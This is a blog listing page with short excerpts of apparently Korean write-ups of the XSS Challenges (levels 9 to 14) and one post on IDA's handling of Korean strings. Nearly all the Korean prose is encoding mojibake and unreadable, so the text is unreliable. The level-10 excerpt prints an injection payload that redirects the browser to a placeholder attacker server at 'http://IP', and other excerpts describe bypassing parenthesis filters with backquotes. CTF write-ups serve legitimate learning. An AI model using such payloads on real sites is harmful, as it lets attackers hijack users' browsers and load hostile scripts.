XSS Challenges 14

14๋‹จ๊ณ„๋ถ€ํ„ฐ๋Š” ์กฐ๊ธˆ์”ฉ ๋‚œ์ด๋„๊ฐ€ ์˜ฌ๋ผ๊ฐ€๋Š” ๊ฒƒ์œผ๋กœ ๋ณด์ž…๋‹ˆ๋‹ค. ๋ฉ”์ธ ํŽ˜์ด์ง€์—๋Š” ๋‹ค์†Œ ์‹ฌํ”Œํ•œ ๋””์ž์ธ์„ ๊ฐ€์ง€๊ณ  ์žˆ๊ธฐ์— ์†Œ์Šค๋ฅผ ๋ณด๋ฉด์„œ ๋ถ„์„์„ ํ•ด๋ณด๋„๋ก ํ•˜๊ฒ ์Šต๋‹ˆ๋‹ค. ๋ณด์ด๋Š” ํฌ์ธํŠธ๊ฐ€ ๋”ฑ 2๊ณณ์ด ํ™•์ธ๋ฉ๋‹ˆ๋‹ค. ์ฒซ๋ฒˆ์งธ๋Š” analytics.js.js ๋ถ€๋ถ„๊ณผ try_harder ๋ณ€์ˆ˜์ž…๋‹ˆ๋‹ค. ์Šคํฌ๋กค ์ œ์ผ ํ•˜๋‹จ์œผ๋กœ ๋‚ด๋ ค๋ณด๋ฉด analytics.js ํŒŒ์ผ์ด ํ•˜๋‚˜ ๋” ์กด์žฌํ•ฉ๋‹ˆ๋‹ค. 3๋ฒˆ์งธ ์ค„์˜ analytics.js.js๋Š” ์œ ํšจํ•˜์ง€ ์•Š์€ ๊ฒฝ๋กœ์ด๋ฉฐ ์Šคํฌ๋กค ์ œ์ผ ํ•˜๋‹จ์—๋Š” ์œ ํšจํ•œ ๊ฒฝ๋กœ๊ฐ€ ์ž…๋ ฅ๋˜์–ด ์žˆ์Šต๋‹ˆ๋‹ค. ์ž…๋ ฅํ•˜๊ณ ์ž ํ•˜๋Š” ํŒŒ๋ผ๋ฏธํ„ฐ์˜ ๊ฐ’์„ ๋ชจ๋‘ ์ œ๊ฑฐํ•ด๋ณด๋ฉด src์— ๋ถ€์—ฌ๋œ ๊ฒฝ๋กœ๋Š” ์ œ๊ฑฐ๋˜์–ด ์žˆ์ง€๋งŒ. js๋Š” ๊ณ ์ •์ ์œผ๋กœ ๋‚จ์•„ ์žˆ์Šต๋‹ˆ๋‹ค. ์ž…๋ ฅ ๊ฐ’ ๊ฒ€์ฆ์€ ์–ด๋–ป๊ฒŒ ์ง„ํ–‰๋˜๋‚˜ ํ™•์ธํ•ด๋ณด๋ฉด ๊ต‰์žฅํžˆ ํƒ€์ดํŠธํ•˜๊ฒŒ ๊ฒ€์ฆํ•˜๊ณ  ์žˆ์–ด ์ž„์˜ ์ž๋ฐ”์Šคํฌ๋ฆฝํŠธ ๊ตฌ๋ฌธ์„ ์‚ฝ์ž…ํ•˜์—ฌ ์‹คํ–‰์‹œํ‚ฌ..

CHALLENGE
IDA ์˜ ํ•œ๊ธ€ํŒŒ์‹ฑ

๊ฐ์ข… ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์„ ๋ถ„์„ํ•˜๊ฑฐ๋‚˜ ์ง„๋‹จํ•  ๋•Œ ํŠน์ • ํ•จ์ˆ˜๋ฅผ ์ถ”์ธกํ•˜์—ฌ ํŠธ๋ ˆ์ด์Šค ํ•˜๊ฑฐ๋‚˜ ๋ฌธ์ž์—ด ๊ฒ€์ƒ‰์„ ํ†ตํ•ด ํฌ์ธํŠธ๋ฅผ ์ฐพ์•„์•ผ ๋ฉ๋‹ˆ๋‹ค. ํ•˜์ง€๋งŒ ๊ตญ๋‚ด์—์„œ ๊ฐœ๋ฐœ๋œ ์ œํ’ˆ์„ ์ด์šฉํ•˜๋‹ค ๋ณด๋ฉด ๋Œ€๋ถ€๋ถ„์ด "ํ•œ๊ธ€"๋กœ ์ด๋ฃจ์–ด์ ธ ์žˆ๊ธฐ ๋•Œ๋ฌธ์— IDA์™€ ์œ ์‚ฌํ•œ Ghidra์—์„œ๋Š” ํ•œ๊ธ€์„ ํ†ตํ•œ ๋ฌธ์ž์—ด ๊ฒ€์ƒ‰์ด ๋˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค. ์ด๋Ÿด ๋•Œ๋Š” IDA์˜ ๊ธฐ๋Šฅ์„ ์ด์šฉํ•˜๋ฉด ๋ณด๋‹ค ์ˆ˜์›”ํ•˜๊ฒŒ ํƒ์ƒ‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋งŒ์•ฝ IDA 7.0 ์ดํ•˜์˜ ๋ฒ„์ „์„ ์‚ฌ์šฉ ์ค‘์ด์‹œ๋ผ๋ฉด ํ•œ๊ธ€ ํŒŒ์‹ฑ์„ ๊ฐ€๋Šฅํ•˜๊ฒŒ๋” ์ปฌ์ฒ˜ํŒŒ์ผ(.clt)์„ ์ถ”๊ฐ€ํ•ด์ค˜์•ผ ๋ฉ๋‹ˆ๋‹ค. ์ถ”๊ฐ€ ๋ฐฉ๋ฒ•์€ ์•„๋ž˜์˜ ๋งํฌ๋ฅผ ํ†ตํ•ด ์ง„ํ–‰ํ•ด์ฃผ์‹œ๋ฉด ๋ฉ๋‹ˆ๋‹ค. http://egloos.zum.com/shadowxx/v/11310107 ida ํ•œ๊ธ€ string (character) ์ œ๋Œ€๋กœ ์ฝ์–ด์˜ค๊ฒŒ ๋งŒ๋“ค๊ธฐ. ์š”์ฆ˜ ํ”„๋กœ๊ทธ๋žจ ๋””๋ฒ„๊น… ์ฐจ์›์—์„œ ๋ช‡๊ฐ€์ง€ ํ…Œ..

ETC
XSS Challenges 13

13๋‹จ๊ณ„ ๋ฉ”์ธ ํŽ˜์ด์ง€๋ฅผ ํ™•์ธํ•ด๋ณด๋ฉด ์ „ ๋‹จ๊ณ„์™€ ์œ ์‚ฌํ•œ ๋””์ž์ธ์„ ๊ฐ€์ง€๊ณ  ์žˆ์œผ๋ฉฐ, 12๋‹จ๊ณ„์—์„œ ์‚ฌ์šฉ๋œ Payload๊ฐ€ ๋™์ž‘ํ•  ์ˆ˜๋„ ๋™์ž‘ํ•˜์ง€ ์•Š์„ ์ˆ˜๋„ ์žˆ๋‹ค๋Š” ๋‚ด์šฉ์ด ๋‹ด๊ฒจ์žˆ์Šต๋‹ˆ๋‹ค. ์ œ๊ฐ€ ์‚ฌ์šฉํ–ˆ๋˜ Payload๋Š” ๋™์ž‘ํ•˜์ง€ ์•Š์•˜์œผ๋ฏ€๋กœ ์ฝ”๋“œ๋ฅผ ์‚ดํŽด๋ณด๊ฒ ์Šต๋‹ˆ๋‹ค. ๋™์ผํ•˜๊ฒŒ ํƒœ๊ทธ๋ฅผ ํ†ตํ•ด untrusted ๋„๋ฉ”์ธ์ด ์„ ์–ธ๋˜์–ด ์žˆ์Šต๋‹ˆ๋‹ค. ์Šคํฌ๋กค์ด ๋„ˆ๋ฌด ๋‚จ์•„ ๋ฐ‘์œผ๋กœ ๋‚ด๋ ค๋ณด๋‹ˆ ` (๋ฐฑ ์ฟผํ„ฐ)๋ฅผ ์‚ฌ์šฉํ•ด์ฃผ๋ฉด ํŒ์—…์ฐฝ์€ ๋ฌด๋ฆฌ ์—†์ด ๋„์šธ ์ˆ˜ ์žˆ์ง€๋งŒ ๋ญ”๊ฐ€ ๋‹ค๋ฅธ ๋ฐฉ์‹์„ ํ†ตํ•ด m ๋ณ€์ˆ˜์— ์„ ์–ธ๋œ "Good Luck!"์„ ๋„์›Œ์ฃผ๊ณ  ์‹ถ์Šต๋‹ˆ๋‹ค. () Bypass ๊ธฐ๋ณธ์ ์œผ๋กœ " () " ๊ด„ํ˜ธ ํ•„ํ„ฐ๋ง์˜ ์šฐํšŒ ๊ธฐ๋ฒ•์„ " `(Back Quote)" ๋กœ ๋งŽ์ด ์‚ฌ์šฉํ•˜์ง€๋งŒ ์ด ๋ฐฉ๋ฒ• ์ด์™ธ์— ์•„๋ž˜์™€ ๊ฐ™์€ 2๊ฐ€์ง€ ์†์„ฑ์„ ์ด์šฉํ•ด ๊ด„ํ˜ธ ์‚ฌ์šฉ์„ ํ”ผํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. 1. Con..

CHALLENGE
XSS Challenges 12

12๋‹จ๊ณ„๋Š” ๋‹ค์†Œ ๋‹ค๋ฅธ ๋ชจ์Šต์˜ ํŽ˜์ด์ง€๋กœ ํ™•์ธ๋ฉ๋‹ˆ๋‹ค. ์†Œ์Šค์ฝ”๋“œ๋ฅผ ๋จผ์ € ๋ณด๋ฉด์„œ ํ•ด๊ฒฐํ•ด๋‚˜๊ฐ€ ๋ณด๋„๋ก ํ•˜๊ฒ ์Šต๋‹ˆ๋‹ค. ์ด์ „ ๋‹จ๊ณ„์—์„œ๋Š” ์ž๋ฐ”์Šคํฌ๋ฆฝํŠธ์— ์„ ์–ธ๋œ ๋ณ€์ˆ˜๋ฅผ ํ™œ์šฉํ•ด์„œ ํŒ์—…์ฐฝ์„ ๋„์› ๋”๋ผ๋ฉด ์ด์ œ๋Š” ์˜ ํƒœ๊ทธ์— ๋ถ€์—ฌ๋œ ์ฃผ์†Œ๋ฅผ ํ™œ์šฉํ•˜์—ฌ ํ•ด๊ฒฐํ•ด์•ผ ๋˜๋Š” ๋ฌธ์ œ์ธ ๊ฒƒ ๊ฐ™์Šต๋‹ˆ๋‹ค. src="" ์†์„ฑ์— ๋ถ€์—ฌ๋œ untrusted ํŽ˜์ด์ง€๋กœ ์ด๋™ํ•ด๋ณด๊ฒ ์Šต๋‹ˆ๋‹ค. untrusted.so.co.il ํŽ˜์ด์ง€๋Š” ์ด์ „ ๋‹จ๊ณ„์—์„œ ๋ณด์—ฌ์กŒ๋˜ ํŽ˜์ด์ง€๋“ค์ฒ˜๋Ÿผ ๋‹ค์†Œ ์‹ฌํ”Œํ•œ ํ™”๋ฉด์„ ๋„์šฐ๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ํ•ด๋‹น ํŽ˜์ด์ง€ ์†Œ์Šค์ฝ”๋“œ๋ฅผ ํ™•์ธํ•ด ๋ณด๊ฒ ์Šต๋‹ˆ๋‹ค. ์œ„์—์„œ๋ถ€ํ„ฐ ํ™•์ธํ•ด๋ณด์‹œ๋ฉด ๋ณ€์ˆ˜ m์—๋Š” 'Good Luck!' String ๋ฌธ์ž์—ด์ด ์„ ์–ธ๋˜์–ด ์žˆ์œผ๋ฉฐ. php? p=์— ์ž…๋ ฅ๋œ Payload๋Š” 12๋ฒˆ์งธ ์ค„์˜ a ๋ณ€์ˆ˜์— 'Payload'; ํ˜•ํƒœ๋กœ ์‚ฝ์ž…๋˜๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ๊ธฐ๋ณธ์ ์œผ๋กœ " ';..

CHALLENGE
XSS Challenges 11

๋ ˆ๋ฒจ 11๋‹จ๊ณ„๋ฅผ ๋ณด์‹œ๋ฉด ๋น„๊ต์  ์‹ฌํ”Œํ•œ ํŽ˜์ด์ง€ ๊ตฌ์„ฑ์œผ๋กœ ๋˜์–ด ์žˆ์Šต๋‹ˆ๋‹ค. ์šฐ์„  ์†Œ์Šค์ฝ”๋“œ ๋จผ์ € ๋ณด๋„๋ก ํ•˜๊ฒ ์Šต๋‹ˆ๋‹ค. ์ด๋ฒˆ์—๋Š” ๋‹ค์†Œ ๋ณต์žกํ•œ ์ฝ”๋“œ๋“ค๋กœ ๊ตฌ์„ฑ๋˜์–ด ์žˆ์Šต๋‹ˆ๋‹ค. .php?p=์— ์ž…๋ ฅ๋œ Payload๋Š” "a"๋ผ๋Š” ๋ณ€์ˆ˜์— ๋‹ด๊ธฐ๊ฒŒ ๋ฉ๋‹ˆ๋‹ค. 11๋‹จ๊ณ„์—์„œ๋ถ€ํ„ฐ๋Š” ์‹คํ–‰ ๊ฐ€๋Šฅํ•œ ์ž…๋ ฅ ๊ฐ’ ์ด์™ธ์—๋Š” ๋ชจ๋‘ ์˜ˆ์™ธ์ฒ˜๋ฆฌ๋ฅผ ์ง„ํ–‰ํ•˜๊ณ  ์žˆ์–ด ๋ณ„๋„์˜ ๋ธ”๋ก ํ™”๋ฉด์ด ๋‚˜ํƒ€๋‚˜๊ฒŒ ๋ฉ๋‹ˆ๋‹ค. ์ด๋ฌธ์ œ๋ฅผ ํ‘ธ์‹ ๋ถ„๋“ค์€ ์ € "Hacking attempt" ํ™”๋ฉด์„ ์ˆ˜์‹ญ ๋ฒˆ ๋ดค์„ ๊ฒƒ์ด๋ผ ์ƒ๊ฐํ•ฉ๋‹ˆ๋‹ค... ์ €๋Š” ํ•ด๊ฒฐํ•˜๊ธฐ ์œ„ํ•ด ์—ฌ๋Ÿฌ ๊ธฐ๋ฒ•๋“ค์˜ Bofore After๋ฅผ ๋ถ„์„ํ–ˆ๋Š”๋ฐ ๋„์ €ํฌ ์‹คํ–‰๊ฐ€๋Šฅํ•œ ๊ตฌ๋ฌธ์„ ๋ชป ์ฐพ์•˜์Šต๋‹ˆ๋‹ค.. ํžŒํŠธ๋ผ๊ณ ๋Š” ์กด์žฌํ•˜์ง€ ์•Š๋Š” ์ฑŒ๋ฆฐ์ง€๊ธฐ ๋•Œ๋ฌธ์— ํ•œ์ฐธ์„ ํ—ค๋งค๋‹ค๊ฐ€ security.stackexchange.com์—์„œ ์šฐ์—ฐํžˆ ํ•ด๊ฒฐ๋ฒ•์„ ํ™•์ธํ–ˆ์Šต๋‹ˆ๋‹ค. ๊ฒฐ๋ก ์ ์œผ๋กœ ..

CHALLENGE
XSS Challenges 10

level 10๋‹จ๊ณ„๋ฅผ ์ง„ํ–‰ํ•˜๊ฒ ์Šต๋‹ˆ๋‹ค. ํ‘œ๋ฉด์ƒ ๋ณด์ด๋Š” ํ™”๋ฉด์€ ์ด์ „๊ณผ ์œ ์‚ฌํ•œ ๋ชจ์Šต์„ ๋„์šฐ๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ๋‚ด๋ถ€ ์ฝ”๋“œ๋ฅผ ๋จผ์ € ์‚ดํŽด๋ณด๋„๋ก ํ•˜๊ฒ ์Šต๋‹ˆ๋‹ค. 10๋‹จ๊ณ„์—์„œ๋Š” a์™€ b๋ผ๋Š” ๋ณ€์ˆ˜์™€ ๊ฐ’์ด ์„ ์–ธ๋˜์–ด ์žˆ๋Š” ์ƒํƒœ์ž…๋‹ˆ๋‹ค. ์šฐ๋ฆฌ๊ฐ€ ์ž…๋ ฅํ•  Payload๋Š” "a" ๋ณ€์ˆ˜์— ๋‹ด๊ธฐ๋„๋ก ๋˜์–ด์žˆ๋Š”๋ฐ document.write ์†์„ฑ์„ ํ†ตํ•ด ๊ฐ’์ด ์‹คํ–‰๋˜๋Š” ๊ฒƒ์„ ๋ณด์‹ค ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. document.write()์˜ ๊ธฐ๋Šฅ์€ Document Object์˜ ํ•จ์ˆ˜๋กœ ์ธ์ˆ˜ ๊ฐ’์„ ์›น ๋ธŒ๋Ÿฌ์šฐ์ € ํ™”๋ฉด์— ํ…์ŠคํŠธ ํ˜•์‹์œผ๋กœ ์ถœ๋ ฅํ•ด์ฃผ๋Š” ๊ธฐ๋Šฅ์„ ๊ฐ€์ง€๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ';{document.location.href="http://IP"}// 9๋‹จ๊ณ„์—์„œ ์ง„ํ–‰ํ•œ ๋ฐฉ๋ฒ•๋Œ€๋กœ a๋ณ€์ˆ˜๋ฅผ ๋‹ซ์•„ ๋งˆ๋ฌด๋ฆฌ(;)ํ•ด์ฃผ๊ณ  ๊ณต๊ฒฉ์ž ์„œ๋ฒ„๋ฅผ ๋กœ๋“œ์‹œ์ผœ ์Šคํฌ๋ฆฝํŠธ๊ฐ€ ์‹คํ–‰๋˜๋„๋ก ํ•ด์ฃผ๋ฉด ๋  ๊ฒƒ ๊ฐ™์Šต๋‹ˆ๋‹ค. ๋’ค..

CHALLENGE
XSS Challenges 9

ํ•œ๋™์•ˆ ์˜ฌ๋ฆฌ์ง€ ๋ชปํ–ˆ๋˜ XSS ์ฑŒ๋ฆฐ์ง€๋ฅผ ์˜ค๋žœ๋งŒ์— ๋‹ค์‹œ ํ’€๊ฒŒ ๋˜์—ˆ์Šต๋‹ˆ๋‹ค. ์ œ๊ฐ€ ์žฌ๋ฏธ์žˆ๊ฒŒ ํ’€๊ณ  ์žˆ๋Š” Alexander Korznikov์˜ XSS ์ฑŒ๋ฆฐ์ง€์˜ ์žฅ์ ์€ ๊ธฐ์กด์˜ XSS ๊ฒŒ์ž„๊ณผ๋Š” ๋‹ค๋ฅด๊ฒŒ ํŒŒํšŒ ๋ฒ•์„ ์˜ฌ๋ฆฐ ์‚ฌ๋žŒ๋“ค์ด ๋งŽ์ด ์—†์œผ๋ฉฐ(๊ตญ๋‚ด์—์„œ๋Š” ๋ณธ ์ ์ด ์—†๋„ค์š”..) ์ถœ์ œ์ž์˜ ์˜๋„๋ฅผ ์•Œ์•„์„œ ํŒŒ์•…ํ•˜๊ณ  ์ผ๋ง์˜ ํžŒํŠธ ์—†์ด ๊ณต๋žต ํ•œ๋‹ค๋Š” ์ ์—์„œ ๋”์šฑ ์• ์ฐฉ์ด ๊ฐ€๊ณ  ๋ชฐ์ž…์ด ๋˜๋Š” ๊ฑฐ ๊ฐ™์Šต๋‹ˆ๋‹ค. ๊ณต๋žต ํŽ˜์ด์ง€๋Š” ๊ต‰์žฅํžˆ ์‹ฌํ”Œํ•ฉ๋‹ˆ๋‹ค. Reflected ๋ฐฉ์‹์œผ๋กœ ํŒŒ๋ผ๋ฏธํ„ฐ์— ์ ์ ˆํ•œ Payload๊ฐ€ ์‚ฝ์ž…๋  ๊ฒฝ์šฐ ๋‹ค์ด์–ผ๋กœ๊ทธ ํŒ์—…์ฐฝ์„ ๋„์šฐ์‹ค ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด์ „ ๋‹จ๊ณ„(8-1) ์˜ ์†Œ์Šค์™€ ์œ ์‚ฌํ•œ ํ˜•ํƒœ์˜ ์ฝ”๋“œ๋ฅผ ๊ฐ€์ง€๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. b๋ผ๋Š” ๋ณ€์ˆ˜์—๋Š” "1"์ด ์„ ์–ธ๋˜์–ด ์žˆ๊ณ  if ์กฐ๊ฑด๋ฌธ์„ ํ†ตํ•ด ์Šคํฌ๋ฆฝํŠธ๊ฐ€ ์‹คํ–‰๋  ์ˆ˜ ์žˆ๋„๋ก ๊ตฌ๋ฌธ์„ ์™„์„ฑ์‹œ์ผœ์•ผ ๋ฉ๋‹ˆ๋‹ค. b์˜ ๋ณ€์ˆ˜..

CHALLENGE